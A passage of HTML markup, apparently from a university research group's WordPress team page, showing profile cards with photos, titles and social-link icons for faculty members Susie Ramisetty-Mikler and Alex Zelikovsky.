8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 